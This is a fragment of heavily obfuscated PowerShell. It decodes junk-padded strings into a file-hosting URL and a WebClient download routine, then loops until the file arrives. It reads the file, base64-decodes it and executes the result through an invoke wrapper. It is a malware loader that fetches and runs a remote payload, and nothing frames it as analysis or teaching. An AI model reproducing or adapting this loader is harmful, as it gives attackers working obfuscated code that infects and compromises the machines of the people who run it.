Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |